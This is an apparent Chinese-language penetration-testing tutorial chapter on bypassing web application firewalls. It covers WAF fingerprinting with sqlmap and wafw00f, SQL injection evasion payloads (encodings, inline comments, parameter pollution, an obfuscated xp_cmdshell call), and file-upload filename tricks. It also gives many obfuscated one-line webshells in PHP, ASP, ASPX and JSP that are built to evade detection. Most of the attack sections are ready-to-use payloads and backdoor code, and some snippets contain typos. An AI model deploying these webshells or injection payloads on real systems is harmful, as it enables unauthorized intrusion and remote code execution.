第五章-WAF 绕过
WAF 绕过
1.WAF分类
1.1.软件 WAF
一般被安装到 Web 服务器中直接对其进行防护,能够接触到服务器上的文件,直接检测服务器上是否有不安全的文件和操作等。
常见的软件:安全狗、云盾、云锁等
1.2.硬件 WAF
以硬件的形式部署在网络链路中,串联部署、旁路部署
串联部署的 WAF 在检测到恶意流程之后可以直接拦截
旁路部署的 WAF 只能记录攻击流程,无法直接进行拦截
常见的硬件 WAF:绿盟 WAF、天融信 WAF、360 WAF 等各大厂商的产品
1.3.云 WAF
前两种无法适配云端业务系统,云 WAF 一般以反向代理的方式进行配置,通过配置 NS 记录或者 CNAME 记录,使相关的服务请求先被发送到云 WAF
常见的云 WAF:安全宝、百度加速乐等
1.4.网站内置 WAF
程序员将拦截防护的功能内嵌到网站中,可以直接对用户的请求进行过滤
这种方式使用在早期防护,自由度较高,但防护能力一般,升级迭代比较麻烦
2.WAF 处理流程
大致分为四个流程:预处理、规则检测、处理模块、日志记录
第一步:预处理。用户请求 Web 服务,该请求到达服务器后先进行身份认证,通过匹配白名单进行检测,判断是否归属白名单。如果归属,就直接把该请求发送到服务器;不然就先进行数据包解析;
第二步:规则检测。上述数据包完成解析后会被投放到规则系统进行匹配,判断是否有不符合规则的请求。如果符合规则,则该数据会被放行到服务器;
第三步:处理模块。如果不符合规则,则会进行拦截,并弹出警告页面。不同 WAF 的产品弹出的警告页面各不相同;
第四步:日志记录。WAF 会将拦截处理等行为记录在日志中,便于对日志进行分析。
3.WAF 识别
3.1.sqlmap 判断
检测语句:sqlmap -u "url" --identify-waf --batch
如果安装的 WAF 没有 “指纹” 特征(比较隐蔽或在 sqlmap 的指纹库中没有该特征信息),那么识别出的结果就是 Generic
注意:详细的识别规则在 sqlmap 的 waf 目录下,也可自己编写规则,编写完成后直接放在 waf 目录下即可
3.2.WAFW00F 识别
安装及简单使用:
git clone https://github.com/EnableSecurity/wafw00f cd wafw00f python setup.py install
wafw00f -l #显示可检测出的 WAF 类型
wafw00f https://www.example.org #检测 WAF 命令
其他工具:https://github.com/stamparm/identYwaf/tree/master
3.3.手工判断
查看网站的拦截页面,被拦截的表现为页面无法访问、响应码不同、返回与正常请求网页时不同的结果等,各类 WAF 的响应页面信息也不同
响应页面:https://github.com/stamparm/identYwaf/tree/master/screenshots、https://developer.aliyun.com/article/1340129
4.SQL 注入漏洞绕过
4.1.大小写绕过
union --> uUiOn
4.2.替换关键字绕过
4.2.1.关键词双写
union --> UNIunionON
4.2.2.同价词替换
| and | && |
| or | || |
| = | <、> |
| 空格 | %20、%09、%0a、%0b、%0c、%0d、%a0、/**/ |
4.2.3.特殊字符拼接
常见的特殊符号:+、#、%23、--+、\\\\、``、@、~、!、%、()、[]、|、%00 等
例如:
select`version`(); #可以绕过空格的过滤
select+id-1+1.from users; #+ 用于连接字符串,使用 - 和 . 可以绕过对空格和关键词的过滤
index.aspx?id=1;exec('ma'+'ster..x'+'p_cm'+dsh+'ell "net user"'); #可以绕过对空格和关键词的过滤,exec 中原语句:master xp_cmdshell net user
4.3.编码绕过
常见编码类型:URL 编码、Base64 编码、Unicode 编码、HEC 编码、ASCII 编码等
4.3.1.URL 编码
在浏览器的输入框中,非保留字的字符会被 URL 编码,如空格变为 %20、单引号变为 %27、左括号变为 %28 等
在绕过 WAF 时可以考虑 URL 编码,针对特殊情况可以进行两次 URL 编码(payload 到达服务器后会自动进行一次 URL 解码,再经过代码中的 urldecode 函数解码)
4.3.2.Base64 编码
一种将二进制数据转换为文本格式的编码方式,将三个字节的二进制数据编码为4个可打印字符
原字符串:select user() --+
编码后:c2VsZWN0IHVzZXIoKSAtLSs=
4.3.3.HEX 编码
原字符串:select user() --+
编码后:\u0073\u0065\u006c\u0065\u0063\u0074\u0020\u0075\u0073\u0065\u0072\u0028\u0029\u0020\u002d\u002d\u002b
4.3.3.Unicode 编码
原字符串:select user() --+
编码后:select user() --+
在线编码网站
4.4.内联注释绕过
指再 SQL 语句中使用注释来避免注入攻击的一种技术,可在无法使用参数化查询或存储的情况下,通过在 SQL 语句中嵌入注释来绕过注入攻击
内联注释原理:在 SQL 语句中嵌入注释,使攻击者无法额外的语句或修改现有的语句(如:使用 -- 来注释整行代码,或使用 /**/ 来注释一段代码)
绕过:
在MySQL中扩展了注释的功能:/*!50001payload*/,这种情况注释里的语句将被执行
例:1'+and +/*!50001sleep(3)*/+and+1=1%23
4.5.HTTP 参数污染
HTTP 参数污染(HTTP Parameter Polution,HPP),又被称为重复参数污染,指当同一参数出现多次时,不同的服务器中间件会将其解析为不同的结果
如果 WAF 只检测了同名参数的第一个或最后一个,并且服务器中间件的特性正好取与 WAF 相反的参数,则可能成功绕过
常见参数污染方法:
|
服务器中间件
|
解析结果
|
举例说明
|
|
ASP .NET/ IIS
|
所有出现的参数值用逗号连接
|
color=red,blue
|
|
ASP / IIS
|
所有出现的参数值用逗号连接
|
color=red,blue
|
|
PHP / Apache
|
仅最后一次出现参数值
|
color=blue
|
|
PHP / Zeus
|
仅最后一次出现参数值
|
color=blue
|
|
JSP,Servlet / Apache Tomcat
|
仅第一次数显参数值
|
color=red
|
|
JSP,Servlet / Oracle Application Server 10g
|
仅第一次数显参数值
|
color=red
|
|
JSP,Servlet / Jetty
|
仅第一次数显参数值
|
color=red
|
|
IBM Lotus Domino
|
仅最后一次出现参数值
|
color=blue
|
|
IBM HTTP Server
|
仅第一次数显参数值
|
color=red
|
|
mod_perl,libapreq2 / Apache
|
仅第一次数显参数值
|
color=red
|
|
Perl CGI / Apache
|
仅第一次数显参数值
|
color=red
|
|
mod_wsgi(python) / Apache
|
仅第一次数显参数值
|
color=red
|
|
Python / Zope
|
转化为 List
|
color=['red','blue']
|
例:xxx.php?id=1'union--+&id=*/%0aselect 1,2,'web.config'--+
Bypass语句:xxx.php?id=1'union--+&id=*/%0aselect 1&iid=2&id='web.config'--+
4.6.分块传输
需要对 POST 数据进行分块传输编码,是 HTTP 的一种传输方式,适用于 HTTP 1.1 版本,需要在请求行中添加 Transfer-Encoding: Chunked。
做法:
- 先拦截数据并将其发送到 Burt Suite 的 Reperter 模块;
- 再使用 Burp Suite 的 Chunked coding comverter 选项,对 POST 数据进行分块传输编码(Encoing request body);
- 向服务器发送已构造好的数据
4.7.sqlmap 绕过 WAF
sqlmap 发出的数据包在默认情况下不会被处理,可能会被服务器的拦截规则 pass,这种情况下可以考虑使用参数 tamper
当脚本在实际测试过程中用处不大时,需要对其进行修改或者重现编写
脚本参考:https://www.cnblogs.com/luoluostudy/p/18115882
5.webshell 变形
5.1.常见一句话木马
| 类型 | 基本木马 |
| PHP | <?php @eval($_POST['key']);?>等 |
| ASPX | <%@ Page Language="Jscript"%><%eval(Request.Item["g"],"unsafe");%>等 |
| ASP | <% eval request("cmd")%>等 |
| JSP | <%!class U extends ClassLoader{ U(ClassLoader c){ super(c); }public Class g(byte []b){ returm super.defineClass(b,0,b.length); }}%><% String cls=request.getParameter("ant"); if(cls!=null){ new U(this.getClass.getClassLoader()).g(new sun.misc.BASE64Decoder().decodeBuffer(cls)).newInstance().equals(pageContext); }%>等 |
小马:代码量比一句话木马多,功能比较单一,比如写木马文件、读敏感文件等,容易被杀软查杀,常见有404小马、功能小马等
大马:代码量大,体积大,可以和一句话木马配合使用(先绕过一句话木马,再上传大马),容易被发现,可以变形或伪装(编码、远程接入等),功能主要为文件管理、命令执行、数据库管理、清理木马、写木马、信息收集、提权、内网渗透等
5.2.自定义函数
create_function 函数,用于在运行时动态创建一个函数
用法:mixed create_function(string $args, string $code)
$args:表示函数的参数列表,使用逗号分割,每个参数可以有一个初始值
$code:表示函数的主体部分,是一个字符串形式的 PHP 代码块
构造一句话木马的脚本:<?php $fun=create_function(' ',$POST['a'];$fun();?>
5.3.回调函数
call_user_func 函数,用于调用第一个参数给定的回调并将其余参数作为参数传递
用法:mixed call_user_func( $function_name[, mixed $value1[, mixed $...]])
$function_name:表示已定义函数列表中函数调用的名称,是一个字符串类型参数
$value:表示混合值,是一个或多个要传递给函数的参数
构造一句话木马脚本:<?Php @call_user_func(assert, $_POST['a']);?>
5.4.脚本型 Webshell
构造脚本型木马的脚本:<script language=php>@eval($_POST['web']);</script>
5.5.加解密
5.5.1. base64_decode 函数
<?php $a=base64_decode("ZXZhbA==");//assert $a($_POST['a']); ?>
5.5.2.str_rot13 函数
算法:将字母表中每一个字母都替换为它后面的第 13 个字母
<?php $a=str_rot13("nffreg");//assert $a($_POST['p']); ?>
5.5.3.综合加密类变形
<?php if(isset($_POST['com'])&&md5($_POST['com'])=='202cb962ac59075b964b07152d234b70'&&isset($_POST['content'])) $content=strtr($_POST['content'], '-_,','+/=');eval(base64_decode($content)); ?> #202cb962ac59075b964b07152d234b70--123
5.6.反序列化
两个函数:serialize()、unserialize()
<?php class Blog {var $vul=''; function_destruct() {eval($this->vul);}} unserialize($_GET['name']); ?>
测试payload:index.php?name=O:4:"Blog":1:{s:3:"vul";s:10:"phpinfo();";}
5.7.类的方法
将操作封装成正常的类,再进行调用
<?php class log {function write($er) {@assert($er);//在定义的类中肯定有某些危险的函数用来执行或解析代码 }} $win=new log(); $win->write($_POST['p']); ?>
5.8.其他方法
5.8.1.get_defined_functions 函数构造木马
作用:返回所有一定义的函数,包括内置函数和用户定义的函数
通过该函数得到所有函数
<?php $a=get_defined_functions(); //print_r($a['internal']); $a['internal'][1110]($_GET['a']); ?>
5.8.2.forward_static_call_array 函数构造木马
作用:允许调用一个类的静态方法,并将方法的参数作为一个数组传递
语法:forward_static_call_array(callable $callback, array $parameters): mixed
$callback:指定要调用的静态方法,可以使用字符串表示,如:MyClass::myMethod;或者使用数组形式表示,如:[$myObject, 'myMethod']
$parameters:包含方法参数的数组
<?php /** * Noticed : (PHP 5 >= 5.3.0, PHP 7) */ $password="cream_sec"; #密码是cream_sec $wx=substr($_SERVER["HTTP_REFERER"],-7,4); forward_static_call_array($wx."ert", array($_REQUEST[$password])); ?>
请求时,先设置 Referer 头,后面以 “ass” 结尾,如:Referer: https://www.baidu.com/ass.php
6.文件上传漏洞绕过
文件上传漏洞原因:
- 文件类型检测不严格;
- 文件大小限制不严格;
- 上传路径可控
- 文件名可控等。
6.1.换行绕过
上传文件,拦截数据包,在文件名处直接添加换行即可
6.2.多个等号绕过
上传文件,拦截数据包,在文件名处添加多个等号:filename===="info.php"
6.3.00 截断绕过
针对文件名可控的文件上传漏洞
上传文件,拦截数据包,在 HEX 模式下,在文件最后添加 %00
6.4.文件名加 ; 绕过
在文件后缀点前面添加 ;:filename="info;.php"
6.5.文件名加 ' 绕过
在文件后缀点前添加 ' :filename="info'.php"
